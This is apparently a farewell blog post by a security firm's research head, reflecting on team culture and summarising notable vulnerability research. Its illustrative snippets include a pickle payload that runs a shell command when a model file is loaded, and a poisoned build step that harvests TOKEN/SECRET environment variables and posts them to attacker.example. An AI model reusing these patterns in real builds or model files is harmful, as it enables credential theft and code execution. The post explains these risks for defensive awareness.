Nearly four years into my role, I am stepping down as NCC Group’s SVP & Global Head of Research. In part just for myself, to reflect on a whirlwind few years, and in part as a thank you and celebration of all of the incredible researchers with whom I have had the privilege of working, I’m writing this post to share:
I am proud of what we have accomplished together. First of all, we survived a global pandemic and somehow managed to publish any security research at all, despite how profoundly this affected so many of us. And it amazes me to say that in fact, across a team of several hundred technical security consultants globally, we’ve published over 600 research publications (research papers, technical blog posts, technical advisories/CVEs, conference talks, and open-source tool releases) since 2019, including releasing well over 60 open-source security tools, and presenting around 150 conference presentations at venues including Black Hat USA, Shmoocon, ACM CCS, Hardwear.io, REcon, IEEE Security & Privacy, Appsec USA, Toorcon, Oracle Code One, BSidesLV, O’Reilly Artificial Intelligence, Chaos Communication Congress, Microsoft BlueHat, HITB Amsterdam, RSA Conference, Ekoparty, CanSecWest, the Linux Foundation Member Summit, DEF CON, and countless others. We won awards, served on advisory boards, hacked drones out of the sky, served on Review Boards of top venues including USENIX WOOT and Black Hat USA, and our research has been covered by media outlets around the world, including Wired, Forbes, The New York Times, Bloomberg, Ars Technica, Politico, DarkReading, Techcrunch, Fast Company, the Wall Street Journal, VICE, and hundreds of other mainstream and trade publications globally.
More importantly, we have:
Watched many researchers graduate from their time at NCC Group to do ever more amazing things, some of whom found their calling through performing their very first research projects within our research program
Patched countless vulnerabilities through collaboration with vendors, and sometimes by just writing the patches ourselves
Demonstrated the commercial viability of highly specialized security consulting practices driven forward ever further through an intense investment in R&D
Advocated and educated for a better (more secure, equitable, privacy-respecting) world through demonstrating the risks and defining the mitigations to critical problems in security & privacy, working with journalists including our numerous collaborations with Which?, and through related policy work like educating US Congressional staffers and testifying before UK Parliament
Supported countless researchers to get their first CVEs, publish their first blog posts, overcome fears, get onstage for the first time at Black Hat, and otherwise face the great unknown standing between themselves and their dreams
And I hope that it has been tremendously worthwhile.
Part 1: On leading a security research team
At NCC Group, our approach to security research has been and will continue to be, I think, somewhat unique within our industry. We do not have a small team of full-time researchers we invest in and put on display as evidence of the firm’s broader capability – rather, all of our researchers are seconded to research part-time from their consulting or internal development roles. We are all peers: people doing their first-ever security research project have the same access to research time and other investment as established, world-class researchers.
We deliberately resist the trope of the “brilliant asshole,” knowing full well that rockstar-ism and disrespect destroy the type of culture which enables the kind of intellectual risk-taking that security research requires. (Besides – the most talented people I’ve met in my career tend to also be the most humble and kind).
From my experiences over the past four years, here are a few other things I believe to be true:
Confidence is a skill. A lot of talent is lost to the world for want of a little courage, and sometimes a single comment or experience can change someone’s career forever. As leaders, the greatest gift we can give the people we manage is the skill of confidence – that is, the unshakable belief in someone that they can handle whatever challenges lie before them, and that they are in a safe enough environment that they know where to turn if they find themselves overwhelmed.
We all have an inner critic, but our inner critic is usually wrong. One of my most meaningful memories from my time in this role was at Black Hat/DEF CON/BSidesLV in 2019, where we had over 20 speakers from NCC Group presenting their research. Over half of those researchers confessed to me, at some moment leading up to their talks, feelings of self-doubt, insecurity, or fear. I was grateful to be that person for them, but heartbroken to hear so many talented people question the worth of their work, and sometimes even of themselves. Those speakers universally went on to give excellent talks that were well-received. The lessons here, I think, are both that (1) even the experienced speakers you admire at the best venues in the industry still have moments of imposter syndrome, and thus that, (2) our inner critic tends to be wrong and we should do our best to feel the fear and do things anyway.
We are better together. Nothing helps us workshop new ideas and dare to try difficult things like having a trusted community who can share their expertise, give a different perspective, and mentor each other to help us grow.
Elitist gatekeeping holds us all back. There are a number of things our industry needs to stop doing, and most of them are “gatekeeping.” Stop preventing interdisciplinary research and hackily attempting to reinvent other fields. Stop forgetting to give credit to those who did something before you, especially when those people aren’t yet well-known in our industry and it’s easiest to diminish their contributions. Stop making people feel more ashamed to ask a question than to pretend they know something they do not. Stop scaring away new contributors for not having achieved RCE before they started kindergarten. Stop blaming users for not being infosec professionals. Which brings me to my next point…
Infosec is more meritocratic for some than others. While most of our industry is awesome, there are still people who assume their female peers or leaders are junior, non-technical, or from the Marketing department (which is also a gendered disservice to men in the Marketing department!). Underrepresented people continue to face a disproportionate amount of condescension and exclusion which in turn can make them less likely to submit their talks to CFPs, contribute to OSS, publish their research, or apply for jobs. This barrage of discouragement meaningfully affects individuals, and can even lead to their departure from our industry. Even if CVE allocation and tier-1 conference talk acceptances are agnostic to things like race and gender, the systemic and cultural obstacles edging underrepresented people out of our industry one unwelcoming conversation at a time are not. This needs to be acknowledged if we hope to change it.
Radical inclusivity breeds technical prowess. People do not take intellectual risks (or even ask questions) in environments in which they do not feel psychologically safe. By creating a deliberate culture of warmth, respect, and inclusion of all skill levels and backgrounds, we can take technical and intellectual risks together, view constructive feedback from others as a gift, experiment without necessarily coupling “failure” with “shame,” and accomplish things we’d otherwise dare not try.
Bold attempts should be rewarded. At NCC Group, we pay bonuses for achievement in research. For the last few years, we have had several different categories for “achievement,” and you only need to satisfy one of them to qualify for an award. One of the categories under which someone can qualify for one of these bonuses is “Difficulty, Audacity, and Effort.” We know that trying something difficult is a risk with huge potential upside, but the downside is that it may fail. We have tried to help “own” that risk with our researchers by rewarding valiant efforts to do hard things, even when those things crash and burn. And I think we’ve been better for it.
Part 2: A few of my favourite projects (2018-2022)
In the last few years we’ve published well over 600 research talks, blogs, papers, tools and advisories. You can read about every single thing we published in 2020 and 2021 in our corresponding Annual Research Reports. Some of the earlier work has, through no fault of our own, unfortunately been lost to the sands of time.
Here, I’ll just share a few (okay, more than a few) of my very favourite things from my time at NCC Group by a number of talented consultants and researchers, past and present. Admittedly, there have been a lot of great projects and this is at best a pseudorandom sample of fond memories. Most of the things below are research projects, but some of them are interesting initiatives we’ve worked on inside or outside NCC Group, not to mention our many publicly-reported security audits of critical software and hardware, and the creation and rapid growth of our Commercial Research division.
Assessing Unikernel Security (Spencer Michaels & Jeff Dileo, 2019) The “Infinite Jest” of unikernel security whitepapers, this 104-page monstrosity performed a necessary security deep-dive into unikernels – single-address-space machine images constructed by treating component applications and drivers like libraries and compiling them, along with a kernel and a thin OS layer, into a single binary blob. It challenged the idea that unikernels’ smaller codebases and lack of excess services necessarily imply security, demonstrating through study of the major unikernels Rumprun and IncludeOS that instead, everything old was new again: now-canonical protections like ASLR, W^X, stack canaries, and heap integrity checks were either completely absent or seriously flawed. The authors furthermore reasoned that if an application running on such a system contains a memory corruption vulnerability, it is often possible for attackers to gain code execution, even in cases where the application’s source and binary are unknown – and worse yet, because the application and the kernel run together as a single process, an attacker who compromises a unikernel can immediately exploit functionality that would require privilege escalation on a regular OS, e.g. arbitrary packet I/O.
The 9 Lives of Bleichenbacher’s CAT: New Cache ATtacks on TLS Implementations (David Wong & external collaborators Eyal Ronen, Robert Gillham, Daniel Genkin, Adi Shamir, & Yuval Yarom, IEEE S&P 2019) This phenomenal paper showed that after 20 years of earnest attempts at patching Bleichenbacher-style padding oracle attacks against RSA implementations of the PKCS #1 v1.5 standard, many are still vulnerable to leakage from novel microarchitectural side channels. In particular, the authors describe and demonstrate Cache-like ATtacks (CATs), enabling downgrade attacks against any TLS connection to a vulnerable server and recovery of all 2048 bits of the RSA plaintext, breaking the security of 7 out of 9 popular implementations of TLS.
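For readers less familiar with this attack class, here is a minimal sketch – my own simplification, not code from the paper – of the PKCS #1 v1.5 conformance check whose pass/fail outcome the attacker learns through the side channel. Each leaked “conformant or not” answer for a chosen ciphertext narrows the interval containing the target plaintext:

def pkcs1_v15_conformant(em: bytes, k: int) -> bool:
    """Check the structure 0x00 0x02 || >=8 nonzero padding bytes || 0x00 || msg.

    A Bleichenbacher-style attacker never sees the plaintext; they only need
    to learn, via error messages, timing, or (as in the CAT paper) cache
    side channels, whether this check passed for a chosen ciphertext.
    """
    if len(em) != k or em[0] != 0x00 or em[1] != 0x02:
        return False
    try:
        separator = em.index(0x00, 2)   # first 0x00 byte after the padding
    except ValueError:
        return False
    return separator >= 10              # at least 8 bytes of nonzero padding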
Practical Attacks on Machine Learning Systems (Chris Anley, 2022) This wide-ranging paper by NCC Group’s Chief Scientist, Chris Anley, discusses real-world attack classes possible on machine learning systems. In it, he reminds us that “models are code,” demonstrating vulnerabilities and attacks related to Python pickle files, PyTorch’s PT and State Dictionary formats, a Keras H5 Lambda layer exploit, TensorFlow, and Apache MXNet, to name a few. He also reproduces a number of existing results from the machine learning attack literature, and presents a taxonomy of attacks on machine learning systems including malicious models, data poisoning, adversarial perturbation, training data extraction, model stealing, “masterprints,” inference by covariance, DoS, and model repurposing. Critically, he reminds us that in addition to all of these novel attack types that are specific to AI/ML, traditional hacking techniques still work on these systems too – discussing the problems of credentials in code, dependency risks, and webapp vulnerabilities like SQL injection – of course, an evergreen topic for Chris 🙂
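To make the “models are code” point concrete, here is a minimal illustrative sketch (my own, not taken from Chris’s paper) of why deserializing an untrusted pickle-format model file is equivalent to handing the model’s author code execution:

import pickle
import os

class MaliciousModel:
    # pickle calls __reduce__ when serializing; whatever callable it returns
    # is invoked at *load* time, so unpickling runs the author's code.
    def __reduce__(self):
        return (os.system, ("echo code execution on model load",))

payload = pickle.dumps(MaliciousModel())

# A victim "loading a model" is actually executing the attacker's callable.
pickle.loads(payload)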
Unpacking .pkgs: A look inside MacOS installer packages (Andy Grant, DEF CON 27) In this work, Andy studied the inner workings of MacOS installer packages and demonstrated where serious security issues can arise, including his findings of a number of novel vulnerabilities and how they can be exploited to elevate privileges and gain code/command execution.
Co-founding the Open Source Security Foundation (Jennifer Fernick, 2020-present) In February 2020, a small group of us across the industry founded the Open Source Security Coalition, with the goal of bringing people from across our industry together to improve the security of the open source ecosystem in a collaborative way, enabling impact-prioritized investment of time and funding toward the most critical and impactful efforts to help secure OSS. In August 2020, this became OpenSSF and moved into its more well-resourced home within the Linux Foundation. Since then, we’ve advised Congressional staffers about supply chain security, which supported the greater work of OpenSSF at the White House Open Source Security Summit. Together with David Wheeler, I also had the privilege of presenting a 2021 Linux Foundation Member Summit Keynote on Securing Open Source Software, which can be viewed here, as well as a talk aimed at security researchers at BHUSA with Christopher Robinson. In May 2022, on the heels of the second OSS Security Summit in DC, we announced the Open Source Software Security Mobilization plan, a $150 million, 10-point plan to radically improve the security of open-source software. In this, I wrote both a proposal for Conducting Third-Party Code Reviews (& Remediation) of up to 200 of the Most-Critical OSS Components (Stream 7, pages 38-40) with Amir Montazery of OSTIF, as well as a proposal for a vendor-neutral Open Source Security Incident Response Team (now called OSS-SIRT, in Stream 5, pages 30-33) which is now being led by the inimitable CRob of Intel.
There’s A Hole In Your SoC: Glitching The MediaTek BootROM (Jeremy Boone & Ilya Zhuravlev, 2020) In this work, Jeremy & Ilya (who was, incredibly, an intern at the time) uncovered an unpatchable vulnerability in the MediaTek MT8163V system-on-a-chip (64-bit ARM Cortex-A), and were able to reliably glitch it to bypass signature verification of the preloader, circumventing all secure boot functionality and thus completely breaking the hardware root of trust. What’s worse is that they have reason to believe this affects other MediaTek chipsets due to a shared BootROM-to-preloader execution flow across them, likely implying that this vulnerability affects a wide variety of embedded devices such as tablets, smart phones, home networking products, and a range of IoT devices.
There’s Another Hole In Your SoC: Unisoc ROM Vulnerabilities (Ilya Zhuravlev, 2022) In this follow-up to Ilya’s previous work, he studied the security of the UNISOC platform’s boot chain, uncovering several unpatchable vulnerabilities in the BootROM which could persistently undermine secure boot. These vulnerabilities could even, for example, be exploited by malicious software which previously escalated its privileges in order to insert a persistent undetectable backdoor into the boot chain. These chips are used across many budget Android phones including some of the recent models produced by Samsung, Motorola and Nokia.
On Linux Random Number Generation (Thomas Pornin, 2019) Wherein Thomas made an unforgettable case for why monitoring entropy levels on Linux systems is not very useful.
Our research partnership with University College London Every year, as a part of our research partnership with UCL’s Centre for Doctoral Training in Data-Intensive Science, we work with a small group of high energy physics and astrophysics PhD students to apply machine learning to a domain-specific problem in cybersecurity. For example, in 2020, we explored deepfake capabilities and mitigation strategies. In 2021, we sought to understand the efficacy of various machine learning primitives for static malware analysis. In 2022, we challenged the students to study the effectiveness of using Generative Adversarial Networks (GANs) to improve fuzzing through preprocessing and other techniques (research paper forthcoming).
10 real-world stories of how we’ve compromised CI/CD pipelines (Aaron Haymore, Iain Smart, Viktor Gazdag, Divya Natesan, & Jennifer Fernick, 2022) We’ve long believed that “CI/CD pipelines are execution engines.” In the past 5 years, we’ve demonstrated countless supply chain attacks in production CI/CD pipelines for virtually every company we’ve tested, with several dozen successful compromises of targets ranging from small businesses to Fortune 500 companies across almost every market and industry. In this blog post we shared 10 diverse examples of ways we’ve compromised development pipelines in real-world engagements with NCC Group clients, with hopes to illuminate the criticality of securing CI/CD pipelines amid our industry’s broader focus on supply-chain security. This blog post was expanded into a talk for BHUSA 2022, “RCE-as-a-Service: Lessons Learned from 5 Years of Real-World CI/CD Pipeline Compromise”
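The “execution engines” framing is easiest to see by considering what a poisoned build step actually is: attacker-controlled code running with whatever credentials the pipeline injects. A deliberately simplified, hypothetical sketch (the exfiltration endpoint and the variable-name matching below are invented purely for illustration):

import os
import urllib.request

# Secrets are commonly exposed to build jobs as environment variables.
leaked = {k: v for k, v in os.environ.items() if "TOKEN" in k or "SECRET" in k}

print("building project...")  # the real build continues, so logs look normal

# ...while the step quietly posts the harvested credentials elsewhere.
urllib.request.urlopen("https://attacker.example/collect",
                       data=repr(leaked).encode())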
Sleight of ARM: Demystifying Intel Houdini (Brian Hong, BHUSA 2021) In this work, Brian reverse engineered Intel’s proprietary Houdini binary translator, which runs ARM binaries on x86, demonstrating security weaknesses it introduces into the processes using it, and showing the capability to do things like execute arbitrary ARM and x86 code and write targeted malware that bypasses existing platform analysis, on platforms used by hundreds of millions.
Finally releasing the long-awaited whitepaper for TriforceAFL (Tim Newsham & Jesse Hertz, 2017) Better late than never! Six years ago, Tim Newsham and Jesse Hertz released TriforceAFL – an extension of the American Fuzzy Lop (AFL) fuzzer which supports full-system fuzzing using QEMU – but unfortunately the associated whitepaper for this work was never published. We did some archaeology around NCC and were happy to be able to release the associated paper a few months ago.
MacOS vulns including CVE-2020-9817 (Andy Grant, 2019-2020) Andy found a privesc bug in the macOS installer (CVE-2020-9817) enabling arbitrary code execution with root privileges, effectively leading to a full system compromise. He also disclosed CVE-2020-3882, a bug in macOS enabling an attacker to retrieve semi-arbitrary files from a target victim’s macOS system using only a calendar invite, giving me an excellent excuse to never take a call again (or, like, until patching) from my friend Andy Grant 🙂
Solitude: A privacy analysis tool (Dan Hastings & Emanuel Flores, Chaos Communication Congress 2020) After showing at DEF CON in 2019 that many mobile apps’ privacy policies lie to us about the data they collect, Dan Hastings was worried about how users who are not themselves security researchers could better understand the privacy risks of the mobile apps they use. Solitude was created with those users in mind – specifically, this open-source privacy analysis tool empowers users to conduct their own privacy investigations into where their private data goes once it leaves their web browser or mobile device, and is broadly extensible and configurable to study a wide range of data types across arbitrary mobile applications. This work was also presented to key end-user communities such as activists, journalists, and others at the human rights conference RightsCon.
On the malicious use of large language models like GPT-3 (Jennifer Fernick, 2021) This blog post explored the theoretical question of whether (and how) large language models like GPT-3 or their successors may be useful for exploit generation, and proposed an offensive security research agenda for large language models, based on a converging mix of existing experimental findings about privacy, learned examples, security, multimodal abstraction, and generativity (of novel output, including code) by large language models including GPT-3.
Critical vulnerabilities in prominent OSS cryptography libraries (Paul Bottinelli, 2021) Paul uncovered critical vulnerabilities enabling arbitrary forgery of ECDSA signatures in several open-source cryptography libraries – one with over 7.3M downloads in the previous 90 days on PyPI, and over 16,000 weekly downloads on npm.
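The flaw boiled down to missing input validation during signature verification. Here is a sketch of the kind of bounds check whose omission makes trivial forgeries such as an all-zero signature possible – my own illustration of the standard requirement, not the affected libraries’ code:

# Illustrative only – the names and structure here are mine, not the affected
# libraries'. ECDSA verification must reject out-of-range signature components
# (r and s must lie in [1, n-1]) before doing any curve math; skipping this
# check is what can let a degenerate signature such as (0, 0) "verify".
def signature_components_in_range(r: int, s: int, n: int) -> bool:
    """Return True only if both r and s lie in [1, n-1] for group order n."""
    return 1 <= r <= n - 1 and 1 <= s <= n - 1

# Example with the secp256k1 group order:
n = 0xFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFEBAAEDCE6AF48A03BBFD25E8CD0364141
assert signature_components_in_range(0, 0, n) is False     # forgery rejected
assert signature_components_in_range(1, n - 1, n) is True  # plausible values pass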
Command and KubeCTL: Real-World Kubernetes Security for Pentesters (Mark Manning, Shmoocon 2020) In this talk and corresponding blog post, Mark explored Kubernetes offensive security across a spectrum of security postures and environments, demonstrating flaws and risks in each – those without regard to security, those with incomplete threat models, and seemingly well-secured clusters. This was a part of a larger body of work by Mark that made significant contributions to the security of k8s.
Wubes: Leveraging the Windows 10 Sandbox for Arbitrary Processes(Cedric Halbronn, 2021) Leveraging the Windows Sandbox, Cedric created a Qubes-like containerization for Microsoft Windows, enabling you to spawn applications in isolation. This means that if you browse a malicious site using Wubes, it won’t be able to infect your Windows host without additional chained exploits. Specifically, this means attackers need 1, 2, 3 and 4 below instead of just 1 and 2 in the case of Firefox:
1) Browser remote code execution (RCE) exploit
2) Local privilege escalation (LPE) exploit
3) Bypass of Code Integrity (CI)
4) Hyper-V (HV) elevation of privilege (EoP)
Coinbugs: Enumerating Common Blockchain Implementation-Level Vulnerabilities (Aleksandar Kircanski & Terence Tarvis, 2020) This paper sought to offer an overview of the various classes of implementation-level security flaws that commonly arise in proof-of-work blockchains, studying the vulnerabilities found during the first decade of Bitcoin’s existence, with the dual-purpose of both offering a roadmap for security testers performing blockchain security reviews, as well as a reference for blockchain developers on common pitfalls. It enumerated 10 classes of blockchain-specific software flaws, introducing several novel bug classes alongside known examples in production blockchains.
Rich Warren’s vulnerabilities in Pulse Connect Secure and SonicWall (2020-2021) Rich Warren and David Cash initially published multiple vulnerabilities in Pulse Connect Secure VPN appliances including an arbitrary file read vulnerability (CVE-2020-8255), an injection vulnerability which can be exploited by an authenticated administrative user to execute arbitrary code as root (CVE-2020-8243), and an uncontrolled gzip extraction vulnerability to overwrite arbitrary files, resulting in RCE as root (CVE-2020-8260). Rich later found that this patch could be bypassed, resulting yet again in RCE (CVE-2021-22937). He later published a series of 6 advisories related to the SonicWall SMA 100 Series, yet again demonstrating systemic vulnerabilities in highly privileged network appliances. This seems to be a theme in our industry, and is highly concerning given major supply chain attack events on similar highly-privileged and ubiquitous network appliances in recent years. I believe it is essential that we continue to dig deeper into the security limitations of these types of devices.
F5 Networks BIG-IP threat intelligence (Research & Intelligence Fusion Team, July 2020) In this work, NCC Group’s RIFT team (led by folks including Ollie Whitehouse & Christo Butcher) published initial analysis of active exploitation NCC Group had observed of the CVSS 10.0 F5 Networks TMUI RCE vulnerability (CVE-2020-5902), which allows arbitrary, active interception of any traffic traversing an internet-exposed, unpatched BIG-IP node. Threat actors initially used it simply to execute code, with later activity involving staged exploitation and web shells, bypassing mitigation attempts, and harvesting credentials, private keys, TLS certificates for load balancers, and more. Here is the Wired piece initially discussing this threat intel.
Breaking a class of binary obfuscation technologies (Nicolas Guigo, 2021) In this work, Nico revealed tools and methods for reversing real-world binary obfuscation, effectively breaking one of the canonical mobile app obfuscation tools and demonstrating that breaking the protections offered by obfuscation tools probably takes attackers orders of magnitude fewer person-hours than our industry tends to assume. (Bonus points to Nico for sending me his epic initial demo for this, set to Eric Prydz’s “Opus”)
Hardware-Backed Heist: Extracting ECDSA Keys from Qualcomm’s TrustZone (Keegan Ryan, ACM CCS 2019) This paper showed the susceptibility of TrustZone to side-channel attacks that allow an attacker to gain insight into the microarchitectural behaviour of trusted code. Specifically, it demonstrated a series of novel vulnerabilities that leak sensitive cryptographic information through shared microarchitectural structures in Qualcomm’s implementation of Android’s hardware-backed keystore, allowing an attacker to extract sensitive information and fully recover a 256-bit ECDSA private key.
Popping Locks, Stealing Cars, and Breaking a Billion Other Things: Bluetooth LE Link Layer Relay Attacks (Sultan Qasim Khan, Hardwear.io NL 2022) The mainstream headline for this was something like, “we hacked a Tesla and drove away,” but the real headline was that Sultan created the world’s first link-layer relay attack on Bluetooth Low Energy – long hypothesized but never before demonstrated – which by its very nature bypasses most existing relay attack mitigations. This story was originally published by Bloomberg but ended up covered by over 900 media outlets worldwide. The advisories for Tesla and BLE are here. This work reminds us that using technologies/protocols/standards for security purposes for which they were not designed can be dangerous.
Hacking in Space (2022-2023) Okay, so, this is just a teaser for future work. Keep an eye on this, umm, space 🚀
Conclusion & greets
It feels so strange to say goodbye – we haven’t even released “Symphony of Shellcode” yet 😮
I’m forever grateful to Dave Goldsmith, Nick Rowe, and Ollie Whitehouse for taking a chance on me and allowing me the unreal opportunity to lead such an esteemed technical team, and for the friendship and contributions of them and of many other technical leaders (past* and present) across NCC Group – not least, NCC Group’s Commercial Research Director and former UK/EU/APAC Research Director Matt Lewis, as well as Jeff Dileo, Jeremy Boone, Will Groesbeck, Kevin Dunn, Ian Robertson, Damian Archer*, Rob Wood, Javed Samuel, Chris Anley, Nick Dunn, Robert Seacord*, Richard Appleby, Timur Duehr, Daniel Romero, Iain Smart, Clint Gibler*, Spencer Michaels*, Drew Suarez*, Joel St John*, Ray Lai*, and Bob Wessen* – as well as our program coordinators Aaron Haymore* and R. Rivera, and the dozens (real talk: hundreds) of talented consultants with whom I’ve had the tremendous privilege of working. Thank you for justifying simultaneously both my deep existential fear that everything is hackable, and my hope that there are so many bright, ethically-minded people using all of their power to make things safer and more secure for us all.